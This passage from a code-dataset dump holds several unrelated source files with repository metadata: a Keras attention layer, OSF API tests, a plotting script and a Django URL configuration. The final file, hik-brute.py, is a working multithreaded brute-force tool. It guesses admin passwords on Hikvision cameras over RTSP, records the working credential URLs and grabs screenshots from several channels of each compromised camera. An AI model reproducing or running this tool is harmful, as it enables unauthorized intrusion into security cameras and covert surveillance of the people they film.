        return nsmallest(count, candidates)
| true | true |
7900eb0e380c4e74be31902804ff4f3e26c91d4d | 732 | py | Python | channel_attention.py | ailabnjtech/B-CNN | 40b78f0fe81120248832609f897be5d04e8d8431 | [
"MIT"
] | null | null | null | channel_attention.py | ailabnjtech/B-CNN | 40b78f0fe81120248832609f897be5d04e8d8431 | [
"MIT"
] | null | null | null | channel_attention.py | ailabnjtech/B-CNN | 40b78f0fe81120248832609f897be5d04e8d8431 | [
"MIT"
] | null | null | null | from keras.layers import Activation, Reshape, Lambda, dot, add
from keras.layers import Conv1D, Conv2D, Conv3D
from keras.layers import MaxPool1D,GlobalAveragePooling2D,Dense,multiply,Activation,concatenate
from keras import backend as K
def squeeze_excitation_layer(x, out_dim, ratio = 4, concate = True):
    """Squeeze-and-Excitation channel-attention block (channels-last layout).

    x: 4-D feature-map tensor. out_dim is expected to equal x's channel
        count so the channel-wise multiply below can broadcast — TODO confirm
        against callers.
    ratio: bottleneck reduction factor for the first Dense layer.
    concate: if True, concatenate the recalibrated map with the original
        input along the channel axis (axis 3), doubling the channel count.
    Returns the recalibrated (and optionally concatenated) feature map.
    """
    # Squeeze: global average pool -> one scalar per channel.
    squeeze = GlobalAveragePooling2D()(x)
    # Excitation: bottleneck MLP ending in sigmoid gates in [0, 1].
    excitation = Dense(units=out_dim // ratio)(squeeze)
    excitation = Activation('relu')(excitation)
    excitation = Dense(units=out_dim)(excitation)
    excitation = Activation('sigmoid')(excitation)
    # Reshape to (1, 1, out_dim) so the gates broadcast over H and W.
    excitation = Reshape((1, 1, out_dim))(excitation)
    # Per-channel rescaling of the input feature map.
    scale = multiply([x, excitation])
    if concate:
        scale = concatenate([scale, x],axis=3)
    return scale
| 33.272727 | 95 | 0.73224 | from keras.layers import Activation, Reshape, Lambda, dot, add
from keras.layers import Conv1D, Conv2D, Conv3D
from keras.layers import MaxPool1D,GlobalAveragePooling2D,Dense,multiply,Activation,concatenate
from keras import backend as K
def squeeze_excitation_layer(x, out_dim, ratio = 4, concate = True):
squeeze = GlobalAveragePooling2D()(x)
excitation = Dense(units=out_dim // ratio)(squeeze)
excitation = Activation('relu')(excitation)
excitation = Dense(units=out_dim)(excitation)
excitation = Activation('sigmoid')(excitation)
excitation = Reshape((1, 1, out_dim))(excitation)
scale = multiply([x, excitation])
if concate:
scale = concatenate([scale, x],axis=3)
return scale
| true | true |
7900ec820b3c3959c1571e60fa82f639ad549104 | 3,089 | py | Python | api_tests/reviews/mixins/comment_settings.py | listinc/osf.io | b9a0357f3e9b6e905b732e750a16e9452c459d78 | [
"Apache-2.0"
] | null | null | null | api_tests/reviews/mixins/comment_settings.py | listinc/osf.io | b9a0357f3e9b6e905b732e750a16e9452c459d78 | [
"Apache-2.0"
] | null | null | null | api_tests/reviews/mixins/comment_settings.py | listinc/osf.io | b9a0357f3e9b6e905b732e750a16e9452c459d78 | [
"Apache-2.0"
] | null | null | null | import pytest
from api.providers.permissions import GroupHelper
from osf_tests.factories import (
ReviewActionFactory,
AuthUserFactory,
PreprintFactory,
PreprintProviderFactory,
)
from osf.utils import permissions as osf_permissions
@pytest.mark.django_db
class ReviewActionCommentSettingsMixin(object):
    """Shared tests for a provider's review-comment visibility settings.

    Concrete test classes must override the `url` fixture with the actions
    endpoint to request.
    """
    @pytest.fixture()
    def url(self):
        # Must be overridden by the concrete test class.
        raise NotImplementedError
    @pytest.fixture()
    def provider(self):
        return PreprintProviderFactory()
    @pytest.fixture()
    def preprint(self, provider):
        return PreprintFactory(provider=provider)
    @pytest.fixture()
    def actions(self, preprint):
        # Five review actions all targeting the same preprint.
        return [ReviewActionFactory(target=preprint) for _ in range(5)]
    @pytest.fixture()
    def provider_admin(self, provider):
        # User placed in the provider's 'admin' moderation group.
        user = AuthUserFactory()
        user.groups.add(GroupHelper(provider).get_group('admin'))
        return user
    @pytest.fixture()
    def provider_moderator(self, provider):
        # User placed in the provider's 'moderator' moderation group.
        user = AuthUserFactory()
        user.groups.add(GroupHelper(provider).get_group('moderator'))
        return user
    @pytest.fixture()
    def node_admin(self, preprint):
        # Admin contributor on the preprint's node (not a provider moderator).
        user = AuthUserFactory()
        preprint.node.add_contributor(
            user,
            permissions=[
                osf_permissions.READ,
                osf_permissions.WRITE,
                osf_permissions.ADMIN])
        return user
    def test_comment_settings(
            self, app, url, provider, actions, provider_admin,
            provider_moderator, node_admin):
        """Admins/moderators always see creator and comment; node admins see
        only what the provider's anonymous/private settings allow."""
        expected_ids = set([l._id for l in actions])
        # Exercise all four combinations of the two provider settings.
        for anonymous in [True, False]:
            for private in [True, False]:
                provider.reviews_comments_anonymous = anonymous
                provider.reviews_comments_private = private
                provider.save()
                # admin always sees comment/creator
                res = app.get(url, auth=provider_admin.auth)
                self.__assert_fields(res, expected_ids, False, False)
                # moderator always sees comment/creator
                res = app.get(url, auth=provider_moderator.auth)
                self.__assert_fields(res, expected_ids, False, False)
                # node admin sees what the settings allow
                res = app.get(url, auth=node_admin.auth)
                self.__assert_fields(res, expected_ids, anonymous, private)
    def __assert_fields(
            self, res, expected_ids, hidden_creator, hidden_comment):
        # Verify the response lists exactly the expected actions and that the
        # 'creator' relationship / 'comment' attribute are hidden or exposed
        # as requested.
        data = res.json['data']
        actual_ids = set([l['id'] for l in data])
        if expected_ids != actual_ids:
            # Raise explicitly so both sets appear in the failure output; the
            # assert below is then only reachable when they already match.
            raise Exception((expected_ids, actual_ids))
        assert expected_ids == actual_ids
        for action in data:
            if hidden_creator:
                assert 'creator' not in action['relationships']
            else:
                assert 'creator' in action['relationships']
            if hidden_comment:
                assert 'comment' not in action['attributes']
            else:
                assert 'comment' in action['attributes']
| 32.861702 | 75 | 0.620913 | import pytest
from api.providers.permissions import GroupHelper
from osf_tests.factories import (
ReviewActionFactory,
AuthUserFactory,
PreprintFactory,
PreprintProviderFactory,
)
from osf.utils import permissions as osf_permissions
@pytest.mark.django_db
class ReviewActionCommentSettingsMixin(object):
@pytest.fixture()
def url(self):
raise NotImplementedError
@pytest.fixture()
def provider(self):
return PreprintProviderFactory()
@pytest.fixture()
def preprint(self, provider):
return PreprintFactory(provider=provider)
@pytest.fixture()
def actions(self, preprint):
return [ReviewActionFactory(target=preprint) for _ in range(5)]
@pytest.fixture()
def provider_admin(self, provider):
user = AuthUserFactory()
user.groups.add(GroupHelper(provider).get_group('admin'))
return user
@pytest.fixture()
def provider_moderator(self, provider):
user = AuthUserFactory()
user.groups.add(GroupHelper(provider).get_group('moderator'))
return user
@pytest.fixture()
def node_admin(self, preprint):
user = AuthUserFactory()
preprint.node.add_contributor(
user,
permissions=[
osf_permissions.READ,
osf_permissions.WRITE,
osf_permissions.ADMIN])
return user
def test_comment_settings(
self, app, url, provider, actions, provider_admin,
provider_moderator, node_admin):
expected_ids = set([l._id for l in actions])
for anonymous in [True, False]:
for private in [True, False]:
provider.reviews_comments_anonymous = anonymous
provider.reviews_comments_private = private
provider.save()
res = app.get(url, auth=provider_admin.auth)
self.__assert_fields(res, expected_ids, False, False)
res = app.get(url, auth=provider_moderator.auth)
self.__assert_fields(res, expected_ids, False, False)
res = app.get(url, auth=node_admin.auth)
self.__assert_fields(res, expected_ids, anonymous, private)
def __assert_fields(
self, res, expected_ids, hidden_creator, hidden_comment):
data = res.json['data']
actual_ids = set([l['id'] for l in data])
if expected_ids != actual_ids:
raise Exception((expected_ids, actual_ids))
assert expected_ids == actual_ids
for action in data:
if hidden_creator:
assert 'creator' not in action['relationships']
else:
assert 'creator' in action['relationships']
if hidden_comment:
assert 'comment' not in action['attributes']
else:
assert 'comment' in action['attributes']
| true | true |
7900eeb2cc19614f887b36c04f3ef1edcb977717 | 2,189 | py | Python | figures/fig3_baf_time_series/baf_TS_plot_lyso_hist.py | jlazzaridean/mScarlet_lifetime_reports_pH | 13b022b1dc1fff8ebd0a881248011923e378889b | [
"CC-BY-4.0"
] | null | null | null | figures/fig3_baf_time_series/baf_TS_plot_lyso_hist.py | jlazzaridean/mScarlet_lifetime_reports_pH | 13b022b1dc1fff8ebd0a881248011923e378889b | [
"CC-BY-4.0"
] | null | null | null | figures/fig3_baf_time_series/baf_TS_plot_lyso_hist.py | jlazzaridean/mScarlet_lifetime_reports_pH | 13b022b1dc1fff8ebd0a881248011923e378889b | [
"CC-BY-4.0"
] | null | null | null | from pathlib import Path
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import Divider, Size
import pandas as pd
# This script plots histograms of pHlys by lysosome from two particular
# recordings (DMSO 10/29 01, pos 5; Baf 10/29 01 pos 9) for use in main
# text figure 3.
current_dir = Path.cwd()
# Repository/manuscript root: two directory levels above this script.
man_dir = current_dir.parents[1]
data_path = man_dir / 'source_data' / 'bafilomycin_time_series' / 'baf_time_series_individ_lyso_results.csv'
results = pd.read_csv(data_path)
# basic plot setup
plt.style.use(man_dir / 'figures' / 'default.mplstyle')
# Default color cycle (NOTE: not used anywhere below in this script).
cycle = plt.rcParams['axes.prop_cycle'].by_key()['color']
# locate the particular recording and position: recording 1 on 2021-10-29,
# position 5 (DMSO control) and position 9 (bafilomycin-treated)
temp = results.loc[results['date'] == 20211029]
temp1 = temp.loc[temp['recording'] == 1]
baf = temp1.loc[temp1['position'] == 9]
dmso = temp1.loc[temp1['position'] == 5]
# Sanity-check that every lifetime falls inside the histogram range (1-5 ns),
# so no lysosome silently drops out of the plotted bins.
assert np.max(dmso['mean_tau_ns'].values) < 5
assert np.max(baf['mean_tau_ns'].values) < 5
assert np.min(dmso['mean_tau_ns'].values) > 1
assert np.min(baf['mean_tau_ns'].values) > 1
# Shared bin edges so the DMSO and BafA histograms are directly comparable.
bin_list = np.linspace(1, 5, num=40)
for x in range(12):
    # figure setup: fixed-size axes placed via a Divider inside a 3x3" figure
    fig1 = plt.figure(figsize=(3,3), dpi=300)
    h = [Size.Fixed(1.0), Size.Fixed(1)]
    v = [Size.Fixed(0.7), Size.Fixed(1)]
    divider = Divider(fig1, (0, 0, 1, 1), h, v, aspect=False)
    axs1 = fig1.add_axes(divider.get_position(),
                         axes_locator=divider.new_locator(nx=1, ny=1))
    # find and plot the correct data; frame_ID is 1-based, x is 0-based
    this_frame_dmso = dmso.loc[dmso['frame_ID'] == x+1]
    axs1.hist(this_frame_dmso['mean_tau_ns'].values, bins=bin_list, alpha=0.5,
              label='DMSO')
    this_frame_baf = baf.loc[baf['frame_ID'] == x+1]
    axs1.hist(this_frame_baf['mean_tau_ns'].values, bins=bin_list, alpha=0.5,
              label='BafA')
    # formatting
    axs1.set_ylabel('# Lysosomes')
    axs1.set_xlabel('Lifetime (ns)')
    axs1.set_xlim(1, 5)
    axs1.set_ylim(0, 60)
    # frames are 5 min apart; time 0 = when baf was added (frame 1 is -8 min)
    axs1.set_title('%d min' % (x * 5 - 8)) # time 0 = when baf was added
    axs1.legend()
    # One PDF per frame, written under ./one_fov/ relative to this script.
    out_path = current_dir / 'one_fov' / ('baf_dmso_hist_oneFOV_t%d.pdf'%x)
    fig1.savefig(out_path, bbox_inches='tight',
                 transparent=True)
plt.show()
| 37.741379 | 108 | 0.67428 | from pathlib import Path
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import Divider, Size
import pandas as pd
current_dir = Path.cwd()
man_dir = current_dir.parents[1]
data_path = man_dir / 'source_data' / 'bafilomycin_time_series' / 'baf_time_series_individ_lyso_results.csv'
results = pd.read_csv(data_path)
plt.style.use(man_dir / 'figures' / 'default.mplstyle')
cycle = plt.rcParams['axes.prop_cycle'].by_key()['color']
temp = results.loc[results['date'] == 20211029]
temp1 = temp.loc[temp['recording'] == 1]
baf = temp1.loc[temp1['position'] == 9]
dmso = temp1.loc[temp1['position'] == 5]
assert np.max(dmso['mean_tau_ns'].values) < 5
assert np.max(baf['mean_tau_ns'].values) < 5
assert np.min(dmso['mean_tau_ns'].values) > 1
assert np.min(baf['mean_tau_ns'].values) > 1
bin_list = np.linspace(1, 5, num=40)
for x in range(12):
fig1 = plt.figure(figsize=(3,3), dpi=300)
h = [Size.Fixed(1.0), Size.Fixed(1)]
v = [Size.Fixed(0.7), Size.Fixed(1)]
divider = Divider(fig1, (0, 0, 1, 1), h, v, aspect=False)
axs1 = fig1.add_axes(divider.get_position(),
axes_locator=divider.new_locator(nx=1, ny=1))
this_frame_dmso = dmso.loc[dmso['frame_ID'] == x+1]
axs1.hist(this_frame_dmso['mean_tau_ns'].values, bins=bin_list, alpha=0.5,
label='DMSO')
this_frame_baf = baf.loc[baf['frame_ID'] == x+1]
axs1.hist(this_frame_baf['mean_tau_ns'].values, bins=bin_list, alpha=0.5,
label='BafA')
axs1.set_ylabel('# Lysosomes')
axs1.set_xlabel('Lifetime (ns)')
axs1.set_xlim(1, 5)
axs1.set_ylim(0, 60)
axs1.set_title('%d min' % (x * 5 - 8))
axs1.legend()
out_path = current_dir / 'one_fov' / ('baf_dmso_hist_oneFOV_t%d.pdf'%x)
fig1.savefig(out_path, bbox_inches='tight',
transparent=True)
plt.show()
| true | true |
7900f081a429cddbd00caa87f27fe51153cc6f27 | 6,431 | py | Python | Q/questionnaire/q_urls.py | ES-DOC/esdoc-questionnaire | 9301eda375c4046323265b37ba96d94c94bf8b11 | [
"MIT"
] | null | null | null | Q/questionnaire/q_urls.py | ES-DOC/esdoc-questionnaire | 9301eda375c4046323265b37ba96d94c94bf8b11 | [
"MIT"
] | 477 | 2015-01-07T18:22:27.000Z | 2017-07-17T15:05:48.000Z | Q/questionnaire/q_urls.py | ES-DOC/esdoc-questionnaire | 9301eda375c4046323265b37ba96d94c94bf8b11 | [
"MIT"
] | null | null | null | ####################
# ES-DOC CIM Questionnaire
# Copyright (c) 2017 ES-DOC. All rights reserved.
#
# University of Colorado, Boulder
# http://cires.colorado.edu/
#
# This project is distributed according to the terms of the MIT license [http://www.opensource.org/licenses/MIT].
####################
from django.conf import settings
from django.conf.urls import patterns, url, include
from django.views.generic.base import RedirectView
from rest_framework.urlpatterns import format_suffix_patterns
from Q.questionnaire.views import *
from Q.questionnaire.views.api import *
from Q.questionnaire.views.services import *
from Q.questionnaire.views.views_feed import QFeed, q_publication
# RESTful API routes.  Order matters in a Django URLconf: the first matching
# regex wins, so keep the "cache" endpoints after the numeric-pk patterns
# (they cannot collide because pk is restricted to [0-9]+).
api_urls = patterns('',
    # test-only endpoint...
    url(r'^projects_test/(?P<pk>[0-9]+)/$', QProjectTestDetail.as_view(), name="project-test-detail"),
    # lightweight serializations used to populate the project page...
    url(r'^customizations_lite/$', QCustomizationLiteList.as_view(), name="customization_lite-list"),
    url(r'^realizations_lite/$', QRealizationLiteList.as_view(), name="realization_lite-list"),
    url(r'^projects_lite/$', QProjectLiteList.as_view(), name="project_lite-list"),
    url(r'^projects_lite/(?P<pk>[0-9]+)/$', QProjectLiteDetail.as_view(), name="project_lite-detail"),
    # full project resources...
    url(r'^projects/$', QProjectList.as_view(), name="project-list"),
    url(r'^projects/(?P<pk>[0-9]+)/$', QProjectDetail.as_view(), name="project-detail"),
    # ontology info...
    url(r'^ontologies/$', QOntologyList.as_view(), name="ontology-list"),
    # customization info (list / detail / pre-cached)...
    url(r'^customizations/$', QModelCustomizationList.as_view(), name="customization-list"),
    url(r'^customizations/(?P<pk>[0-9]+)/$', QModelCustomizationDetail.as_view(), name="customization-detail"),
    url(r'^customizations/cache/$', get_cached_customizations, name="customization-cache"),
    # realization info (list / detail / pre-cached)...
    url(r'^realizations/$', QModelRealizationList.as_view(), name="realization-list"),
    url(r'^realizations/(?P<pk>[0-9]+)/$', QModelRealizationDetail.as_view(), name="realization-detail"),
    url(r'^realizations/cache/$', get_cached_realizations, name="realization-cache"),
)
if settings.DEBUG:
    # only expose the browsable API root page in debug mode...
    api_urls += patterns('', url(r'^$', api_root))
# let DRF add ".json" / ".api" style suffix routes (JSON is the default)...
api_urls = format_suffix_patterns(api_urls)
# AJAX-only webservice routes (POST endpoints outside the RESTful API).
services_urls = patterns('',
    # testing (obviously)...
    url(r'^test/$', q_services_test),
    # fetch pending django messages for the current session...
    url(r'^messages/$', get_django_messages),
    # routing http calls through a proxy...
    url(r'^proxy/$', q_proxy, name="proxy"),
    # logging data sent from the client...
    url(r'^log/$', q_log, name="log"),
    # the load-on-demand paradigm: render one section of a form at a time...
    url(r'^load_section/(?P<section_type>[^/]+)/$', q_load_section, name="load_section"),
    # joining a project...
    url(r'^(?P<project_name>[^/]+)/project_join_request/$', q_project_join_request, name="project_join_request"),
    # managing a project...
    url(r'^(?P<project_name>[^/]+)/project_add_member/$', q_project_add_member, name="project_add_member"),
    # deleting a customization...
    url(r'^customization_delete/$', q_customization_delete, name="customization_delete"),
    # adding a relationship value...
    # NOTE(review): the route names below misspell "relationship" as
    # "relationsip"; templates/JS may reverse() these exact names, so the typo
    # is flagged here rather than fixed -- confirm all reverse() callers
    # before renaming.
    url(r'^realization_add_relationship_value/$', q_realization_add_relationship_value, name="realization_add_relationsip_value"),
    # removing a relationship value...
    url(r'^realization_remove_relationship_value/$', q_realization_remove_relationship_value, name="realization_remove_relationsip_value"),
    # publishing a realization...
    url(r'^realization_publish/$', q_realization_publish, name="realization_publish"),
)
# Top-level URLconf.  Project-name routes come last so that fixed prefixes
# ("api", "services", "test", "help", "feed") are matched first.
urlpatterns = patterns('',
    # RESTful API...
    url(r'^api/', include(api_urls)),
    # webservices (AJAX POST only) outside of the RESTful API...
    url(r'^services/', include(services_urls)),
    # testing (obviously)...
    url(r'^test/$', q_test, name="test"),
    # help (external site, permanent redirect)...
    url(r'^help/$', RedirectView.as_view(url=settings.Q_HELP_URL, permanent=True), name="help"),
    # customizations...
    url(r'^(?P<project_name>[^/]+)/customize/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/$', q_customize_new, name="customize_new"),
    url(r'^(?P<project_name>[^/]+)/customize/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/(?P<customization_name>[^/]+)/$', q_customize_existing, name="customize_existing"),
    # realizations (edit / view / fetch)...
    url(r'^(?P<project_name>[^/]+)/edit/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/$', q_edit_new, name="edit_new"),
    url(r'^(?P<project_name>[^/]+)/edit/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/(?P<realization_pk>[^/]+)/$', q_edit_existing, name="edit_existing"),
    url(r'^(?P<project_name>[^/]+)/view/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/$', q_view_new, name="view_new"),
    url(r'^(?P<project_name>[^/]+)/view/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/(?P<realization_pk>[^/]+)/$', q_view_existing, name="view_existing"),
    url(r'^(?P<project_name>[^/]+)/get/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/$', q_get_existing, name="get_existing"),
    # publications (ATOM feed), from least to most specific...
    url(r'^feed/$', QFeed(), name="feed"),
    url(r'^feed/(?P<project_name>[^/]+)/$', QFeed(), name="feed_project"),
    url(r'^feed/(?P<project_name>[^/]+)/(?P<ontology_key>[^/]+)/$', QFeed(), name="feed_project_ontology"),
    url(r'^feed/(?P<project_name>[^/]+)/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/$', QFeed(), name="feed_project_ontology_proxy"),
    url(r'^feed/(?P<project_name>[^/]+)/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/(?P<publication_name>[^/]+)/$', q_publication, name="publication_latest"),
    url(r'^feed/(?P<project_name>[^/]+)/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/(?P<publication_name>[^/]+)/(?P<publication_version>[^/]+)/$', q_publication, name="publication_version"),
    # projects...
    url(r'^(?P<project_name>[^/]+)/$', q_project, name="project"),
    url(r'^(?P<project_name>[^/]+)/customize/$', q_project_customize, name="project_customize"),
    url(r'^(?P<project_name>[^/]+)/manage/$', q_project_manage, name="project_manage"),
    # index...
    # Bug fix: this was the dotted string 'questionnaire.views.q_index', which
    # does not match the actual package path (the app lives under
    # Q.questionnaire, see the imports above) and relies on string-view
    # dispatch that Django deprecated in 1.8 and removed in 1.10.  Use the
    # callable imported via `from Q.questionnaire.views import *` instead.
    url(r'^$', q_index, name="index"),
)
| 46.941606 | 195 | 0.664438 | , q_publication
api_urls = patterns('',
url(r'^projects_test/(?P<pk>[0-9]+)/$', QProjectTestDetail.as_view(), name="project-test-detail"),
url(r'^customizations_lite/$', QCustomizationLiteList.as_view(), name="customization_lite-list"),
url(r'^realizations_lite/$', QRealizationLiteList.as_view(), name="realization_lite-list"),
url(r'^projects_lite/$', QProjectLiteList.as_view(), name="project_lite-list"),
url(r'^projects_lite/(?P<pk>[0-9]+)/$', QProjectLiteDetail.as_view(), name="project_lite-detail"),
url(r'^projects/$', QProjectList.as_view(), name="project-list"),
url(r'^projects/(?P<pk>[0-9]+)/$', QProjectDetail.as_view(), name="project-detail"),
url(r'^ontologies/$', QOntologyList.as_view(), name="ontology-list"),
url(r'^customizations/$', QModelCustomizationList.as_view(), name="customization-list"),
url(r'^customizations/(?P<pk>[0-9]+)/$', QModelCustomizationDetail.as_view(), name="customization-detail"),
url(r'^customizations/cache/$', get_cached_customizations, name="customization-cache"),
url(r'^realizations/$', QModelRealizationList.as_view(), name="realization-list"),
url(r'^realizations/(?P<pk>[0-9]+)/$', QModelRealizationDetail.as_view(), name="realization-detail"),
url(r'^realizations/cache/$', get_cached_realizations, name="realization-cache"),
)
if settings.DEBUG:
api_urls += patterns('', url(r'^$', api_root))
api_urls = format_suffix_patterns(api_urls)
services_urls = patterns('',
url(r'^test/$', q_services_test),
url(r'^messages/$', get_django_messages),
url(r'^proxy/$', q_proxy, name="proxy"),
url(r'^log/$', q_log, name="log"),
url(r'^load_section/(?P<section_type>[^/]+)/$', q_load_section, name="load_section"),
url(r'^(?P<project_name>[^/]+)/project_join_request/$', q_project_join_request, name="project_join_request"),
url(r'^(?P<project_name>[^/]+)/project_add_member/$', q_project_add_member, name="project_add_member"),
url(r'^customization_delete/$', q_customization_delete, name="customization_delete"),
url(r'^realization_add_relationship_value/$', q_realization_add_relationship_value, name="realization_add_relationsip_value"),
url(r'^realization_remove_relationship_value/$', q_realization_remove_relationship_value, name="realization_remove_relationsip_value"),
url(r'^realization_publish/$', q_realization_publish, name="realization_publish"),
)
urlpatterns = patterns('',
url(r'^api/', include(api_urls)),
url(r'^services/', include(services_urls)),
url(r'^test/$', q_test, name="test"),
url(r'^help/$', RedirectView.as_view(url=settings.Q_HELP_URL, permanent=True), name="help"),
url(r'^(?P<project_name>[^/]+)/customize/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/$', q_customize_new, name="customize_new"),
url(r'^(?P<project_name>[^/]+)/customize/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/(?P<customization_name>[^/]+)/$', q_customize_existing, name="customize_existing"),
url(r'^(?P<project_name>[^/]+)/edit/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/$', q_edit_new, name="edit_new"),
url(r'^(?P<project_name>[^/]+)/edit/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/(?P<realization_pk>[^/]+)/$', q_edit_existing, name="edit_existing"),
url(r'^(?P<project_name>[^/]+)/view/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/$', q_view_new, name="view_new"),
url(r'^(?P<project_name>[^/]+)/view/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/(?P<realization_pk>[^/]+)/$', q_view_existing, name="view_existing"),
url(r'^(?P<project_name>[^/]+)/get/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/$', q_get_existing, name="get_existing"),
url(r'^feed/$', QFeed(), name="feed"),
url(r'^feed/(?P<project_name>[^/]+)/$', QFeed(), name="feed_project"),
url(r'^feed/(?P<project_name>[^/]+)/(?P<ontology_key>[^/]+)/$', QFeed(), name="feed_project_ontology"),
url(r'^feed/(?P<project_name>[^/]+)/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/$', QFeed(), name="feed_project_ontology_proxy"),
url(r'^feed/(?P<project_name>[^/]+)/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/(?P<publication_name>[^/]+)/$', q_publication, name="publication_latest"),
url(r'^feed/(?P<project_name>[^/]+)/(?P<ontology_key>[^/]+)/(?P<document_type>[^/]+)/(?P<publication_name>[^/]+)/(?P<publication_version>[^/]+)/$', q_publication, name="publication_version"),
url(r'^(?P<project_name>[^/]+)/$', q_project, name="project"),
url(r'^(?P<project_name>[^/]+)/customize/$', q_project_customize, name="project_customize"),
url(r'^(?P<project_name>[^/]+)/manage/$', q_project_manage, name="project_manage"),
url(r'^$', 'questionnaire.views.q_index', name="index"),
)
| true | true |
7900f26237b09df2759789b602213197fc0dc727 | 2,228 | py | Python | hik-brute.py | haka110/Cam-Brute | a5e9114caab9e6a0a031e07d7b26604bebd86151 | [
"MIT"
] | 2 | 2022-02-11T08:41:38.000Z | 2022-03-12T14:39:59.000Z | hik-brute.py | haka110/Cam-Brute | a5e9114caab9e6a0a031e07d7b26604bebd86151 | [
"MIT"
] | 1 | 2021-11-17T13:44:22.000Z | 2021-11-17T13:44:22.000Z | hik-brute.py | haka110/Cam-Brute | a5e9114caab9e6a0a031e07d7b26604bebd86151 | [
"MIT"
] | 1 | 2022-03-12T18:18:38.000Z | 2022-03-12T18:18:38.000Z | import os
import time
import datetime
import socket
import platform
import sys
from multiprocessing.dummy import Pool as ThreadPool
from colorama import Fore, Back, Style
def rtspbrute(ip1):
log=open("logs",'r')
if ip1 not in log:
flag=0
ip1 = ip1[:-1]
os.system("mkdir -p Hikvision/%s 2> /dev/null"%(str(ip1).strip()))
dat=datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')
os.system("mkdir Hikvision/%s/%s 2>/dev/null" %(ip1.strip(),dat.strip()))
for passw in passread:
chann=1
passw = passw[:-1]
print Fore.YELLOW+"\nRunning '%s' with password '%s'\n" %(str(ip1).strip(), str(passw))
os.system("ffmpeg -v quiet -stimeout 7000000 -rtsp_transport tcp -y -i rtsp://admin:%s@%s:554/Streaming/Channels/101/ -ss 00:00:01.50 -vframes 1 Hikvision/%s/%s_temp.jpg " %(str(passw).strip(),str(ip1).strip(),str(ip1).strip(),ip1.strip()))
if os.path.exists("Hikvision/%s/%s_temp.jpg" %(str(ip1).strip(),str(ip1).strip())):
print Fore.GREEN + "Found Access of %s with password %s" %(str(ip1).strip(), str(passw))
print(Style.RESET_ALL)
access = open("hik-access-list","a")
print >> access, ("rtsp://admin:%s@%s:554/Streaming/Channels/101/" %(str(passw),str(ip1).strip()))
access.close()
log = open("logs","a")
print >> log, (str(ip1))
flag=1
while chann<=3:
print "Trying to take screenshot of Channel No. "+str(chann)
os.system("ffmpeg -v quiet -stimeout 7000000 -rtsp_transport tcp -y -i rtsp://admin:%s@%s:554/Streaming/Channels/%s01/ -ss 00:00:01.50 -vframes 1 Hikvision/%s/%s/%s_%s.jpg " %(str(passw).strip(),str(ip1).strip(),str(chann),str(ip1).strip(),str(dat).strip(),ip1.strip(),str(chann)) )
chann=chann+1
if flag == 1:
break
return 1
if __name__ == "__main__":
iplist = sys.argv[1]
f = open(iplist,"r")
ip = f.readlines()
passlist = sys.argv[2]
password = open(passlist,"r")
passread = password.readlines()
access = open("hik-access-list","w")
access.close()
pool = ThreadPool(100)
results = pool.map(rtspbrute, ip)
pool.close()
pool.join()
os.system("find Hikvision/ -type d -empty -delete")
os.system("python pics-viewer.py Hikvision")
os.system("mv index.html Hikvision.html")
print Fore.CYAN+"\n\nFINISHED\n"
| 38.413793 | 287 | 0.658887 | import os
import time
import datetime
import socket
import platform
import sys
from multiprocessing.dummy import Pool as ThreadPool
from colorama import Fore, Back, Style
def rtspbrute(ip1):
log=open("logs",'r')
if ip1 not in log:
flag=0
ip1 = ip1[:-1]
os.system("mkdir -p Hikvision/%s 2> /dev/null"%(str(ip1).strip()))
dat=datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')
os.system("mkdir Hikvision/%s/%s 2>/dev/null" %(ip1.strip(),dat.strip()))
for passw in passread:
chann=1
passw = passw[:-1]
print Fore.YELLOW+"\nRunning '%s' with password '%s'\n" %(str(ip1).strip(), str(passw))
os.system("ffmpeg -v quiet -stimeout 7000000 -rtsp_transport tcp -y -i rtsp://admin:%s@%s:554/Streaming/Channels/101/ -ss 00:00:01.50 -vframes 1 Hikvision/%s/%s_temp.jpg " %(str(passw).strip(),str(ip1).strip(),str(ip1).strip(),ip1.strip()))
if os.path.exists("Hikvision/%s/%s_temp.jpg" %(str(ip1).strip(),str(ip1).strip())):
print Fore.GREEN + "Found Access of %s with password %s" %(str(ip1).strip(), str(passw))
print(Style.RESET_ALL)
access = open("hik-access-list","a")
print >> access, ("rtsp://admin:%s@%s:554/Streaming/Channels/101/" %(str(passw),str(ip1).strip()))
access.close()
log = open("logs","a")
print >> log, (str(ip1))
flag=1
while chann<=3:
print "Trying to take screenshot of Channel No. "+str(chann)
os.system("ffmpeg -v quiet -stimeout 7000000 -rtsp_transport tcp -y -i rtsp://admin:%s@%s:554/Streaming/Channels/%s01/ -ss 00:00:01.50 -vframes 1 Hikvision/%s/%s/%s_%s.jpg " %(str(passw).strip(),str(ip1).strip(),str(chann),str(ip1).strip(),str(dat).strip(),ip1.strip(),str(chann)) )
chann=chann+1
if flag == 1:
break
return 1
if __name__ == "__main__":
iplist = sys.argv[1]
f = open(iplist,"r")
ip = f.readlines()
passlist = sys.argv[2]
password = open(passlist,"r")
passread = password.readlines()
access = open("hik-access-list","w")
access.close()
pool = ThreadPool(100)
results = pool.map(rtspbrute, ip)
pool.close()
pool.join()
os.system("find Hikvision/ -type d -empty -delete")
os.system("python pics-viewer.py Hikvision")
os.system("mv index.html Hikvision.html")
